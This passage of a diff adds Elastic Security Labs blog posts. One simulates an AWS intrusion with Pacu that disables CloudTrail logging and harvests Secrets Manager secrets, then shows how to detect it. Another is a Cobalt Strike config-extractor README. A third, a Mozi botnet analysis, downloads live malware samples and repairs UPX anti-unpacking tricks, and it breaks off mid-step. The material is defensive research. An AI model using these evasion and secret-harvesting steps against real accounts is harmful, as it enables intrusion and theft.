details. These keys may be harvested in a variety of ways, including through phishing, a data breach, GitHub repositories, screenshots, error messages, snapshot data, or simply poor key management practices. By obtaining these keys, an attacker can take a variety of actions against your AWS infrastructure.\n\nLet's walk through one of the many potential attack scenarios that could play out. 
In the following example, the adversary enumerates the trails and monitoring capabilities that have been configured for the AWS account. They follow up on this activity by disabling a trail and a configuration recorder in an attempt to evade detection and then proceed to harvest secrets.\n\n### Simulating adversary behavior in AWS\n\nIn this demonstration, we'll use [Pacu](https://github.com/RhinoSecurityLabs/pacu) to perform our attack. Pacu is a popular framework for exploiting AWS infrastructure, developed and maintained by Rhino Security Labs. Pacu is modular, similar to other exploitation frameworks like Metasploit and Koadic, and enables attackers to exploit configuration flaws within an AWS account. Attackers can use Pacu to check if the required permissions are assigned to the compromised account before attempting to execute a module. From an attacker's perspective, this helps avoid running modules that would ultimately fail, which would create unnecessary noise in the logs and draw additional attention from defenders.\n\nThe attacker begins by enumerating services using the detection\_\_enum_services module to determine what logging and monitoring services are enabled for the AWS account.\n\n\n\nThe attacker discovered eight trails, as well as ten configuration rules, a recorder, and a delivery channel. Essentially, the enumeration script is querying certain AWS API calls to list or describe relevant information about the environment. 
By reviewing the [code](https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/detection__enum_services/main.py) of the module, we can see the targeted APIs:\n\n```\nDescribeSubscription\nGetSubscriptionState\nDescribeTrails\nListDetectors\nDescribeConfigRules\nDescribeConfigurationRecorders\nDescribeConfigurationRecorderStatus\nDescribeDeliveryChannels\nDescribeDeliveryChannelStatus\nDescribeConfigurationAggregators\nDescribeAlarms\nDescribeFlowLogs\n```\n\nAfter the attacker determines which services are running, their next logical step may be to interrupt logging and monitoring by disabling a trail, alarm, detector, or recorder in an attempt to evade detection. To accomplish this objective, we'll use a different module called detection\\_\\_disruption to disable a trail called brentlog, and stop the configuration recorder named default.\n\n\n\nAt this point, with trail logging suspended and the configuration recorder turned off from tracking changes to resources, the attacker may want to check if there are any credentials, API keys, or tokens available in [Secrets Manager](https://aws.amazon.com/about-aws/whats-new/2018/04/introducing-aws-secrets-manager/#:~:text=AWS%20Secrets%20Manager%20is%20a,other%20secrets%20throughout%20their%20lifecycle.) and if so, collect them. In this scenario, the attacker uses the enum_secrets module and finds one secret in the directory, /sessions/brent/downloads/secrets/secrets_manager. Harvesting these secrets could help the adversary achieve lateral movement and/or privilege escalation.\n\n\n\n\n\nWe'll stop our fictitious attack scenario here, but if you're curious to learn what the attacker could do next, the following Google search will return some examples: intitle:\"AWS\" intext:(\"attack\" | \"breach\"). 
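The enumeration APIs listed above also double as a defender's watchlist. As a rough illustration (not one of Elastic's built-in rules), the Python sketch below counts how many distinct enumeration APIs each user invokes and flags users whose activity resembles the detection\_\_enum_services module; the flattened dot-notation keys (`event.action`, `user.name`) are a simplification of ECS-normalized CloudTrail events.\n\n```python\nfrom collections import defaultdict\n\n# APIs queried by Pacu's detection__enum_services module (listed above)\nENUM_APIS = {\n    "DescribeSubscription", "GetSubscriptionState", "DescribeTrails",\n    "ListDetectors", "DescribeConfigRules", "DescribeConfigurationRecorders",\n    "DescribeConfigurationRecorderStatus", "DescribeDeliveryChannels",\n    "DescribeDeliveryChannelStatus", "DescribeConfigurationAggregators",\n    "DescribeAlarms", "DescribeFlowLogs",\n}\n\ndef flag_enumeration(events, threshold=5):\n    """Return the set of user names that invoked at least `threshold`\n    distinct enumeration APIs. `events` is an iterable of dicts using\n    flattened ECS-style keys ("event.action", "user.name")."""\n    seen = defaultdict(set)\n    for event in events:\n        action = event.get("event.action")\n        if action in ENUM_APIS:\n            seen[event.get("user.name")].add(action)\n    return {user for user, apis in seen.items() if len(apis) >= threshold}\n```\n\nIn practice you would scope this to a time window and run it against indexed CloudTrail data; the threshold of five distinct calls is an arbitrary illustration.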
In the next section, we'll see what this behavior looks like from a defender's perspective and how Elastic Security can be used to detect it.\n\n### Detecting and investigating the suspicious behavior in AWS\n\nWhen monitoring the usage of the previously mentioned APIs, it can be difficult to distinguish benign activity from suspicious behavior, such as an attacker enumerating an environment. In production environments, monitoring for calls to these APIs can be noisy, as the behavior is quite common. To help find this rare and potentially suspicious behavior, in addition to the AWS detection rules we have available, we've released [machine learning](https://github.com/elastic/detection-rules/tree/main/rules/ml) jobs in 7.9 specifically for AWS CloudTrail that help identify outliers, such as patterns of unusual activity that are hard to find using conventional detection rules.\n\nLooking at our detections page from the previous attack, we can see that multiple alerts were triggered. Our free built-in detection rules identified the techniques of _suspending a trail_, _stopping a configuration recorder_, and _grabbing sensitive information from the secrets manager_. 
The other alerts are from the machine learning jobs [_Unusual Country For an AWS Command_](https://www.elastic.co/guide/en/security/7.9/unusual-city-for-an-aws-command.html) and [_Unusual AWS Command for a User_](https://www.elastic.co/guide/en/security/master/unusual-aws-command-for-a-user.html), which identify a geolocation (country) that is unusual for the command or a user context that does not normally use the command.\n\n\n\nIf we pivot into one of the machine learning alerts, we can see a description of what it detected, along with a built-in investigation guide to walk an analyst through a potential workflow when analyzing an unusual CloudTrail event.\n\n\n\n\n\nLet's also take a look at the details in the Timeline view from the [_AWS Configuration Recorder Stopped_](https://www.elastic.co/guide/en/security/master/aws-configuration-recorder-stopped.html) alert. The fields I'm particularly interested in are the API call, user agent string, user identity type, request parameters, and the raw text of the entire event.\n\n\n\nBy analyzing the alert, we're able to quickly determine:\n\n| Field | Description |\n| ------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| event.action | Tells us the AWS API call that was made, StopConfigurationRecorder |\n| request_parameters | Gives us the details about what was sent in the request, in our case, the configuration recorder name, default |\n| user.name | Informs us as to who made the request, pacu |\n| user_identity.type | Contains details about the type of Identity and Access Management (IAM) identity. In our case, an IAMUser. Root is another user identity type we have built-in rules for. |\n| user_agent | The value of the HTTP User-Agent header. 
User agent strings can be easily modified, but if an account typically uses the AWS Java SDK for its API calls, and it changes, then the detection of the anomalous user agent string can be a quick win. |\n| event.original | Gives us the raw alert details |\n\n_Table 1 - Analysis of alert fields_\n\nAfter analyzing the alert, we can start to piece together the events and look at what actions the user took just before our alerts fired (and afterwards as applicable). Again, we can spot the attacker's enumeration here as well.\n\n\n\nWe may also want to search our environment for specific API calls to see if they were invoked by other users or hosts, from different IPs, or at other time frames that would be suspicious in our environment.\n\n\n\nWe can also create a visualization to look for the least common API calls in our environment and pivot from there. For AWS, the API calls are in the event.action field.\n\n\n\nAs demonstrated, our free built-in rules for AWS can detect this activity as well as a number of other potential attack scenarios. We've opened up our [rules repository](https://github.com/elastic/detection-rules) and encourage you to have a look and learn how to [contribute](https://github.com/elastic/detection-rules#how-to-contribute) if interested.\n\n## Detecting suspicious behavior in Okta logs\n\n[Okta single sign-on (SSO)](https://www.okta.com/products/single-sign-on/) is a cloud solution that allows users to log into a variety of systems in their organization via a centralized process using a single user account. Because end users only have to remember one username and password instead of ten or more, there is less risk that they'll adopt poor password hygiene, and system administrators can enforce stronger password policies. Further, multi-factor authentication (MFA) policies can be configured in Okta, which raises the barriers to entry for attackers. 
Many attackers will simply move on to look for an easier target when they discover that MFA is enforced for their target's network or user account.\n\nWhile SSO solutions can provide a convenient user experience and reduce cybersecurity risk for an organization, these centralized systems offer a type of skeleton key to many systems and applications, which makes them an attractive target for attackers. For example, if an adversary manages to harvest an Okta administrator's credentials or API token, they could attempt to perform any of the actions in the non-exhaustive list below:\n\n- Modify or disable MFA policies for one or more applications in order to weaken their victim's security controls.\n- Create new user accounts or API tokens to maintain persistence in their target's environment and attempt to “blend in” and evade detection.\n- Modify, delete, or deactivate an Okta network zone to loosen the restrictions on which geolocations users or administrators can log in from.\n- Delete or disable an application or other configuration to create a Denial-of-Service (DoS) condition and impact a company's business operations.\n\nTo enable security teams to monitor their Okta environment for suspicious activity, our [Okta Filebeat module](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-okta.html) can pull [Okta System Log](https://developer.okta.com/docs/reference/api/system-log/) events and ship them to Elasticsearch to be indexed. Okta's System Log records events related to an organization in order to provide an audit trail that can be used to understand platform activity. The Elastic Security Intelligence & Analytics Team has [free rules](https://github.com/elastic/detection-rules/tree/main/rules/okta) to detect suspicious activity in Okta logs and will continue adding more in the future.\n\nIn the following example, imagine that an adversary has harvested an API token after gaining initial access to an organization's network. 
The API token has administrator privileges, and the adversary executes some actions in their target's Okta environment:\n\n- Create a new user account and assign administrative permissions to it in order to maintain a presence in the target environment should the security team discover that the current API token is compromised\n- Deactivate a sign-on policy in order to weaken the target's security controls\n- Disable a network zone to enable attackers to authenticate from any geographical location during their intrusion\n\nThe Okta Filebeat module was configured to ship Okta System Log events to Elasticsearch and our Okta rules were activated in Elastic Security. The suspicious activity triggered three alerts shown in Figure 12 below.\n\n\n\nClicking on one of the alerts allows the analyst to review more information about the rule, including the description of the behavior that the rule detects, severity and risk scores, and the associated MITRE ATT&CK® tactic and technique. The analyst can scroll further down the page and begin to investigate the alert in Timeline.\n\nTo learn more about how Elastic supports ATT&CK, see our presentation: [How to Plan and Execute a Hunt](https://youtu.be/2Hh5spqA6bw).\n\n\n\nSecurity practitioners know that every organization's network is different. Behavior that looks suspicious in one environment may be benign in another. To help security teams find the proverbial “signal in the noise,” users can add exceptions to their detection rules to filter benign events and continue to alert on suspicious events. Figure 14 shows an exception being added to an Okta rule.\n\n\n\nWe've also introduced the \"threshold\" rule type. Threshold rules aggregate query results and generate an alert when the number of matched events exceeds a certain threshold. The example rule below will generate an alert when 25 Okta user authentication failures occur from a single source IP address. 
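The aggregation behind such a threshold rule can be sketched in a few lines of Python. This is only an illustration of the counting logic, not the rule's actual implementation; the `user.session.start` action and the flattened ECS-style keys are assumptions about how the Okta events are indexed.\n\n```python\nfrom collections import Counter\n\ndef threshold_alerts(events, threshold=25):\n    """Count failed Okta authentications per source IP and return the\n    IPs (with counts) that meet the threshold. `events` is an iterable\n    of dicts with flattened ECS-style keys; "user.session.start" with\n    outcome "failure" stands in for a failed authentication attempt."""\n    failures = Counter(\n        event["source.ip"]\n        for event in events\n        if event.get("event.action") == "user.session.start"\n        and event.get("event.outcome") == "failure"\n    )\n    return {ip: count for ip, count in failures.items() if count >= threshold}\n```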
This can be indicative of a brute force or password spraying attack.\n\n\n\nViewing an alert generated by a threshold rule in the Timeline allows an analyst to review the events that triggered the rule and begin their triage process or investigation.\n\n\n\n## Conclusion\n\nAccording to Verizon's latest [Data Breach Investigations Report](https://enterprise.verizon.com/resources/reports/dbir/), cloud assets were involved in 24% of the 3,950 data breaches the report reviewed last year. As organizations continue to migrate their data and business operations to the cloud, we can expect this number to increase.\n\nIn this blog post, we discussed some of the challenges that security teams face when attempting to monitor for, detect, and investigate suspicious behavior in their organization's cloud environments. We walked through some practical examples of how attackers operate in cloud environments and how Elastic Security can detect those techniques.\n\nThe Elastic Security Intelligence & Analytics Team researches adversary tradecraft and develops new detection rules and machine learning jobs for multiple platforms, including cloud. Our users can expect to see our continued focus on increasing the cost of cloud attacks.\n\nConfiguring our [Filebeat modules](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-modules.html) to ship logs to Elasticsearch and enabling detection rules in Elastic Security is easy. Our [free detection rules](https://github.com/elastic/detection-rules) help security teams monitor those logs and detect suspicious behavior, regardless of the size of their team. Elastic Security enables analysts to triage and investigate those alerts quickly and efficiently.\n\nIf you're interested in learning more about Elastic Security, you can [download it for free](https://www.elastic.co/security) or sign up for a free 14-day trial of [Elastic Cloud](https://www.elastic.co/cloud/).\n"
+ },
+ "title": "Security operations: Cloud monitoring and detection with Elastic Security",
+ "slug": "cloud-monitoring-and-detection-with-elastic-security",
+ "date": "2022-11-30",
+ "description": "As companies migrate to cloud, so too do opportunist adversaries. That's why our Elastic Security team members have created free detection rules for protecting users' cloud platforms like AWS and Okta. Learn more in this blog post.",
+ "author": [
+ {
+ "slug": "brent-murphy"
+ },
+ {
+ "slug": "david-french"
+ },
+ {
+ "slug": "elastic-security-intelligence-analytics-team"
+ }
+ ],
+ "image": "blog-thumb-network-attack-map.jpg",
+ "category": null
+ },
+ "id": "security_labs_content-cloud_monitoring_and_detection_with_elastic_security-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cobalt_strike_beacon_extractor-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cobalt_strike_beacon_extractor-md.json
new file mode 100644
index 00000000000..abf4c519743
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cobalt_strike_beacon_extractor-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Cobalt Strike Beacon Extractor\"\nslug: \"cobalt-strike-beacon-extractor\"\ndate: \"2022-12-06\"\ndescription: \"Python script that collects Cobalt Strike memory data generated by security events from an Elasticsearch cluster, extracts the configuration from the CS beacon, and writes the data back to Elasticsearch.\"\nauthor:\n - slug: elastic-security-labs\nimage: \"tools-image.jpg\"\ncategory:\n - slug: tools\ntags:\n - cobaltstrike\n---\n\nPython script that collects Cobalt Strike memory data generated by security events from an Elasticsearch cluster, extracts the configuration from the CS beacon, and writes the data back to Elasticsearch.\n\n[Download cobalt-strike-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdbc4f9f2366d2f06/628829603b9b8554904a4ba2/cobalt-strike-extractor.tar.gz)\n\n## Overview\n\nThis tool provides a Python module and command line tool that will search Elastic Endpoint alert data for detections of Cobalt Strike and the extracted memory data. When present, this tool will extract the implant configuration using the [cobaltstrike-config-extractor](https://github.com/strozfriedberg/cobaltstrike-config-extractor). The information is then normalized into an ECS-formatted JSON document and indexed into an Elasticsearch cluster or output to the terminal as JSON.\n\n> For help on creating Fleet policies to collect and analyze Cobalt Strike beacons in the Elastic Stack, check out our blog posts detailing this:\n>\n> - [Collecting Cobalt Strike beacons](https://www.elastic.co/security-labs/collecting-cobalt-strike-beacons-with-the-elastic-stack)\n> - [Extracting Cobalt Strike beacon configurations](https://www.elastic.co/security-labs/extracting-cobalt-strike-beacon-configurations)\n\n## Getting Started\n\n### Docker\n\nThe recommended and easiest way to get going is to use Docker. From the directory this README is in, you can build a local container.\n\n```\ndocker build . 
-t cobalt-strike-extractor\n```\n\nNext, make a copy of config.reference.yml and name it config.local.yml and edit for your environment. A minimal config looks like the example below. The input and output could use the same values, but you can optionally push it to a different cluster for analysis.\n\n```\n## Using an Elastic Cloud instance (this is a randomly generated example)\ninput.elasticsearch:\n enabled: True\n cloud.id: security-cluster:dXMtd2VzdDEuZ2NwLmNsb3VkLmVzLmlvJGU0MWU1YTc3YmRjNzY2OTY0MDg2NjIzNDA5NzFjNjFkJDdlYjRlYTJkMzJkMTgzYTRiMmJkMjlkNTNjODhjMjQ4\n cloud.auth: elastic:\n\n## Default output will use localhost:9092, see reference config\noutput.elasticsearch:\n enabled: True\n username: elastic\n password: \n\n```\n\nNow, run the container, passing in our local configuration. The -v flag here will add informational messages to the log output. Here, it tells us how many documents were successfully parsed and written.\n\n```\ndocker run -ti --rm -v \"$(pwd)/config.local.yml:/config.yml\" \\\n cobalt-strike-extractor:latest -c /config.yml -v\n\n```\n\n_Output_:\n\n```\n[2022-01-10T21:33:31.493][INFO] Setting up input/output\n[2022-01-10T21:33:31.493][INFO] Connecting to Elasticsearch for input\n[2022-01-10T21:33:31.493][INFO] Successfully connected to Elasticsearch for input\n[2022-01-10T21:33:31.834][INFO] Connecting to Elasticsearch for output\n[2022-01-10T21:33:31.835][INFO] Successfully connected to Elasticsearch for output\n[2022-01-10T21:33:33.030][WARNING] Could not parse source as PE file (DOS Header magic not found.)\n[2022-01-10T21:33:33.078][WARNING] CobaltStrike Beacon config not found:\n[2022-01-10T21:33:33.093][WARNING] Could not parse source as PE file (DOS Header magic not found.)\n[2022-01-10T21:33:33.096][WARNING] CobaltStrike Beacon config not found:\n[2022-01-10T21:33:33.097][WARNING] Could not parse source as PE file (DOS Header magic not found.)\n[2022-01-10T21:33:33.097][WARNING] CobaltStrike Beacon config not 
found:\n[2022-01-10T21:33:33.097][WARNING] Could not parse source as PE file (DOS Header magic not found.)\n[2022-01-10T21:33:33.098][WARNING] CobaltStrike Beacon config not found:\n[2022-01-10T21:33:33.186][WARNING] Could not parse source as PE file (DOS Header magic not found.)\n[2022-01-10T21:33:33.191][WARNING] CobaltStrike Beacon config not found:\n[2022-01-10T21:33:33.461][WARNING] Could not parse source as PE file (DOS Header magic not found.)\n[2022-01-10T21:33:33.516][WARNING] CobaltStrike Beacon config not found:\n[2022-01-10T21:33:33.927][INFO] Wrote 2 docs to Elasticsearch\n\n```\n\nThe [WARNING] messages here are to be expected. These are simply source documents that didn’t contain the configuration information.\n\n#### Filter by time\n\nTo limit the search by time frame, you can add the --since argument, which takes either an ISO-formatted date time string or you can use [Elastic date math](https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl-range-query.html#ranges-on-dates). For example, to limit search to the last 30 days, you can do the following.\n\n```\ndocker run -ti --rm -v \"$(pwd)/config.local.yml:/config.yml\" \\\n cobalt-strike-extractor:latest --since \"now-30d/d\" -c config.local.yml\n\n```\n\n#### Pipe output to other tools\n\nLastly, you can pipe the output to other commands, such as jq to do local analysis. You can also override the configuration file values using environment variables.\n\n```\ndocker run -i --rm -a stdin -a stdout -a stderr \\\n -v \"$(pwd)/config.local.yml:/config.yml\" \\\n -e \"OUTPUT_ELASTICSEARCH_ENABLED=False\" \\\n -e \"OUTPUT_CONSOLE_ENABLED=True\" cobalt-strike-extractor:latest -c /config.yml -q | jq '.cobaltstrike.server.hostname'\n\n```\n\nIn the example above, we disabled the Elasticsearch output and enabled the Console output using environment variables. We made the output more quiet using the -q flag (hiding the warnings). 
Then, we used jq to just pull out the “hostname” value of the configuration.\n\n### Running it Locally\n\nAs mentioned above, Docker is the recommended approach to running this project; however, you can also run it locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will set up a virtual environment, install the dependencies, activate the virtual environment, and run the console script.\n\n```\npoetry lock\npoetry install\npoetry shell\ncobalt-strike-extractor --help\n\n```\n\nOnce that works, you can do the same sort of things as mentioned in the Docker instructions above.\n"
+ },
+ "title": "Cobalt Strike Beacon Extractor",
+ "slug": "cobalt-strike-beacon-extractor",
+ "date": "2022-12-06",
+ "description": "Python script that collects Cobalt Strike memory data generated by security events from an Elasticsearch cluster, extracts the configuration from the CS beacon, and writes the data back to Elasticsearch.",
+ "author": [
+ {
+ "slug": "elastic-security-labs"
+ }
+ ],
+ "image": "tools-image.jpg",
+ "category": [
+ {
+ "slug": "tools"
+ }
+ ],
+ "tags": [
+ "cobaltstrike"
+ ]
+ },
+ "id": "security_labs_content-cobalt_strike_beacon_extractor-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-collecting_and_operationalizing_threat_data_from_the_mozi_botnet-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-collecting_and_operationalizing_threat_data_from_the_mozi_botnet-md.json
new file mode 100644
index 00000000000..5811a5d2ded
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-collecting_and_operationalizing_threat_data_from_the_mozi_botnet-md.json
@@ -0,0 +1,33 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Collecting and operationalizing threat data from the Mozi botnet\"\nslug: \"collecting-and-operationalizing-threat-data-from-the-mozi-botnet\"\ndate: \"2022-06-02\"\ndescription: \"The Mozi botnet is an ongoing malware campaign targeting unsecured and vulnerable networking devices. This post will showcase the analyst journey of collecting, analyzing, and operationalizing threat data from the Mozi botnet.\"\nauthor:\n - slug: andrew-pease\n - slug: seth-goodwin\n - slug: derek-ditch\n - slug: daniel-stepanic\nimage: \"blog-thumb-mozi-botnet.jpg\"\ncategory:\n - slug: security-research\n---\n\nDetecting and preventing malicious activity such as botnet attacks is a critical area of focus for threat intel analysts, security operators, and threat hunters. Taking up the Mozi botnet as a case study, this blog post demonstrates how to use open source tools, analytical processes, and the Elastic Stack to perform analysis and enrichment of collected data irrespective of the campaign. This will allow you to take the lessons and processes outlined below to your organization and apply them to your specific use cases.\n\nThe Mozi botnet has been leveraging vulnerable Internet of Things (IoT) devices to launch campaigns that can take advantage of the force multiplication provided by a botnet (Distributed Denial of Service (DDoS), email spam, brute-force, password spraying, etc.). Mozi was [first reported](https://blog.netlab.360.com/mozi-another-botnet-using-dht/) by the research team at 360Netlab in December 2019 and has continued to make up a large portion of IoT network activity across the Internet-at-large.\n\nAs reported by 360Netlab, the botnet spreads via the use of weak and default remote access passwords for targeted devices as well as through multiple public exploits. The Mozi botnet communicates using a Distributed Hash Table (DHT) which records the contact information for other nodes in the botnet. 
This is the same serverless mechanism used by file sharing peer-to-peer (P2P) clients. Once the malware has accessed a vulnerable device, it executes the payload and subsequently joins the Mozi P2P network. The newly infected device listens for commands from controller nodes and also attempts to infect other vulnerable devices.\n\nMozi targets multiple IoT devices and systems, mainly focused on Small Office Home Office (SOHO) networking devices, Internet-connected audio visual systems, and theoretically any 32-bit ARM device.\n\n## Collection\n\nWhen performing data analysis, the more data that you have, the better. Analysis of malware campaigns is no different. With a paid subscription to VirusTotal, you can collect huge amounts of data for analysis, but we wanted an approach for independent researchers or smaller organizations that may not have this premium service. To do that, we decided to keep to our roots at Elastic and leverage open source datasets to avoid a paywall that could prevent others from using our processes.\n\nTo begin, we started with a handful of [Mozi samples](https://threatfox.abuse.ch/browse.php?search=tag%3Amozi) collected from [ThreatFox](https://threatfox.abuse.ch/). ThreatFox is an open source platform from [Abuse.ch](https://abuse.ch) with the goal of sharing malware indicators with the security research community.\n\nUsing cURL, we queried the ThreatFox API for the Mozi tag. 
This returned back JSON documents with information about the malware sample, based on the tagged information.\n\n```\ncurl -X POST https://threatfox-api.abuse.ch/api/v1/ -d '{ \"query\": \"taginfo\", \"tag\": \"Mozi\", \"limit\": 1 }'\n```\n\n_Code block 1 - cURL request to ThreatFox API_\n\n- -X POST - change the cURL HTTP method from GET (default) to POST as we’re going to be sending data to the ThreatFox API\n- `https://threatfox-api.abuse.ch/api/v1/` - this is the ThreatFox API endpoint\n- -d - this is denoting that we’re going to be sending data\n- query: taginfo - the type of query that we’re making, taginfo in our example\n- tag: Mozi - the tag that we’ll be searching for, “Mozi” in our example\n- limit: 1 - the number of results to return, 1 result in our example, but you can return up to 1000 results\n\nThis returned the following information:\n\n```\n{\n \"query_status\": \"ok\",\n \"data\": [\n {\n \"id\": \"115772\",\n \"ioc\": \"nnn.nnn.nnn.nnn:53822\",\n \"threat_type\": \"botnet_cc\",\n \"threat_type_desc\": \"Indicator that identifies a botnet command&control server (C&C)\",\n \"ioc_type\": \"ip:port\",\n \"ioc_type_desc\": \"ip:port combination that is used for botnet Command&control (C&C)\",\n \"malware\": \"elf.mozi\",\n \"malware_printable\": \"Mozi\",\n \"malware_alias\": null,\n \"malware_malpedia\": \"https:\\/\\/malpedia.caad.fkie.fraunhofer.de\\/details\\/elf.mozi\",\n \"confidence_level\": 75,\n \"first_seen\": \"2021-06-15 08:22:52 UTC\",\n \"last_seen\": null,\n \"reference\": \"https:\\/\\/bazaar.abuse.ch\\/sample\\/832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b\\/\",\n \"reporter\": \"abuse_ch\",\n \"tags\": [\n \"Mozi\"\n ]\n }\n ]\n```\n\n_Code block 2 - Response from ThreatFox API_\n\nNow that we have the file hashes of several samples, we can download the samples using the Malware Bazaar API. Malware Bazaar is another open source platform provided by Abuse.ch. 
While ThreatFox is used to share contextual information about indicators, Malware Bazaar allows for the actual collection of malware samples (among other capabilities).\n\nJust like with ThreatFox, we’ll use cURL to interact with the Malware Bazaar API, but this time to download the actual malware samples. Of note, the Malware Bazaar API can be used to search for samples using a tag (“Mozi”, in our example), similar to how we used the ThreatFox API. The difference is that the ThreatFox API returns network indicators that we’ll use later on for data enrichment.\n\n```\ncurl -X POST https://mb-api.abuse.ch/api/v1 -d 'query=get_file&sha256_hash=832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b' -o 832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b.raw\n```\n\n_Code block 3 - cURL request to Malware Bazaar API_\n\n- -X POST - change the cURL HTTP method from GET (default) to POST as we’re going to be sending data to the Malware Bazaar API\n- `https://mb-api.abuse.ch/api/v1` - this is the Malware Bazaar API endpoint\n- -d - this is denoting that we’re going to be sending data\n- query: get_file - the type of query that we’re making, get_file in our example\n- sha256_hash - the SHA256 hash we’re going to be collecting, “832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b” in our example\n- -o - the file name we’re going to save the binary as\n\nThis will save a file locally named 832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b.raw. We want to make a raw file that we’ll not modify so that we always have an original sample for archival purposes. This downloads the file as a Zip archive. The passphrase to extract the archive is infected. This will create a local file named 832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b.elf. 
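The two API calls are easy to chain in a short script. The helper below is a hypothetical example (not part of any published tooling) that pulls the SHA256 hashes out of a ThreatFox taginfo response so they can be fed into Malware Bazaar's get_file query; it assumes only the response shape shown in Code block 2.\n\n```python\nimport re\n\n# A SHA256 hash is 64 lowercase hex characters\nSHA256_RE = re.compile(r"[0-9a-f]{64}")\n\ndef hashes_from_taginfo(response):\n    """Extract sample SHA256 hashes from the `reference` URLs of a\n    ThreatFox taginfo response (shape as shown in Code block 2)."""\n    hashes = set()\n    for entry in response.get("data", []):\n        reference = entry.get("reference") or ""\n        match = SHA256_RE.search(reference)\n        if match:\n            hashes.add(match.group(0))\n    return sorted(hashes)\n```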
Going forward, we’ll use a shorter name for this file, truncated-87d3b.elf, for readability.\n\n### Unpacking\n\nNow that we have a few samples to work with we can look at ripping out strings for further analysis. Once in our analysis VM we took a stab at running [Sysinternals Strings](https://docs.microsoft.com/en-us/sysinternals/downloads/strings) over our sample:\n\n```\n$ strings truncated-87d3b.elf\nELF\n*UPX!\nELF\n$Bw\n(GT\n...\n```\n\n_Code block 3 - Strings output from the packed Mozi sample_\n\nRight away we see that we have a [UPX](https://upx.github.io/) packed ELF binary from the “ELF” and “UPX!” text. UPX is a compression tool for executable files, commonly known as “packing”. So the next logical step is to decompress the ELF file with the UPX program. To do that, we’ll run upx with the -d switch.\n\n```\n$ upx -d truncated-87d3b.elf\n Ultimate Packer for eXecutables\n Copyright (C) 1996 - 2020\nUPX 3.96w Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020\n File size Ratio Format Name\n -------------------- ------ ----------- -----------\nupx.exe : upx: truncated-87d3b.elf : CantUnpackException: p_info corrupted\n```\n\n_Code block 4 - UPX output from corrupted Mozi sample_\n\nAnother road-block: the p_info section of the file appears to be corrupted. p_info is the sum of two sections from a file, p_blocksize and p_filesize . After a quick search for the error message, we landed on a [CUJOAI Anti-Unpacking blog](https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/) explaining the header corruptions commonly used in IoT malware to disrupt automated analysis tools.\n\nUsing this information, we cracked open our binary in [xxd](https://linux.die.net/man/1/xxd), a HEX dumper, to see which corruption we were dealing with. As described in the CUJOAI blog, the p_info blocks represent the sum of the p_filesize blocks and the p_blocksize blocks. This section begins with the 8 bytes after the UPX! 
text, and has been overwritten with zeros (the 8 bytes starting at 0x84).\n\n```\n$ xxd truncated-87d3b.elf\n00000000: 7f45 4c46 0101 0161 0000 0000 0000 0000 .ELF...a........\n00000010: 0200 2800 0100 0000 1057 0200 3400 0000 ..(......W..4...\n00000020: 0000 0000 0202 0000 3400 2000 0200 2800 ........4. ...(.\n00000030: 0000 0000 0100 0000 0000 0000 0080 0000 ................\n00000040: 0080 0000 0de0 0100 0de0 0100 0500 0000 ................\n00000050: 0080 0000 0100 0000 b07a 0000 b0fa 0600 .........z......\n00000060: b0fa 0600 0000 0000 0000 0000 0600 0000 ................\n00000070: 0080 0000 10f1 8f52 5550 5821 1c09 0d17 .......RUPX!....\n00000080: 0000 0000 0000 0000 0000 0000 9400 0000 ................\n00000090: 5e00 0000 0300 0000 f97f 454c 4601 7261 ^.........ELF.ra\n000000a0: 000f 0200 28dd 0001 0790 b681 0334 ee07 ....(........4..\n000000b0: ec28 04db 1302 0bfb 2000 031b be0a 0009 .(...... .......\n...\n```\n\n_Code block 5 - HEX view of the corrupted Mozi sample_\n\nThe CUJOAI blog states that if you manually restore the zeroed p_filesize and p_blocksize values, this will fix the corruption issue. The original file size is still stored near the end of the packed file (the 4 bytes starting at 0x1e110), and below we can see that value in HEX; we can use it to manually update the p_filesize and p_blocksize sections, which will allow us to unpack the binary.\n\n```\n$ xxd truncated-87d3b.elf\n...\n0001e0c0: 1914 a614 c998 885d 39ec 4727 1eac 2805 .......]9.G'..(.\n0001e0d0: e603 19f6 04d2 0127 52c9 9b60 00be 273e .......'R..`..'>\n0001e0e0: c00f 5831 6000 0000 0000 90ff 0000 0000 ..X1`...........\n0001e0f0: 5550 5821 0000 0000 5550 5821 0d17 0308 UPX!....UPX!....\n0001e100: 5199 6237 591c 321c d001 0000 b800 0000 Q.b7Y.2.........\n0001e110: 7c2a 0400 5000 0011 8000 0000 |*..P.......\n```\n\n_Code block 6 - p_info HEX data from the corrupted Mozi sample_\n\nFirst, let’s open the file with Vim. 
